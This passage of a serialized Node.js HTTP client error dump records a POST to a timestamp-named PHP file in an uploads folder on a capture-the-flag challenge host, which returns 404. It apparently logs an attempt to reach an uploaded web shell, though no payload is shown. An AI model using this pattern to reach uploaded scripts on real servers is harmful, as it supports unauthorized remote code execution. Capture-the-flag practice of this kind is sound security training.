endingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"statusCode":404,"statusMessage":"Not Found","trailers":{},"upgrade":false,"url":""},"response":null,"url":"http://8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show/uploads/20240213142923813.php","writable":true},"res":{"_consuming":false,"_dumped":false,"_events":{"error":[null,null]},"_eventsCount":3,"_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":false,"emitClose":true,"emittedReadable":false,"encoding":null,"endEmitted":true,"ended":true,"flowing":false,"highWaterMark":16384,"length":0,"needReadable":false,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":false,"readingMore":true,"resumeScheduled":false,"sync":true},"aborted":false,"client":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"complete":true,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"data":"","headers":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"httpVersion":"1.1","httpVersionMajor":1,"httpVersionMinor":1,"method":null,"rawHeaders":["Server","nginx/1.20.1","Date","Tue, 13 Feb 2024 06:35:56 GMT","Content-Type","text/html","Transfer-Encoding","chunked","Connection","close","Content-Encoding","gzip"],"rawTrailers":[],"readable":false,"req":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"statusCode":404,"statusMessage":"Not Found","trailers":{},"upgrade":false,"url":""},"serverError":false,"status":404,"statusCode":404,"statusType":4,"type":"text/html","unauthorized":false,"unprocessableEntity":false},"status":404}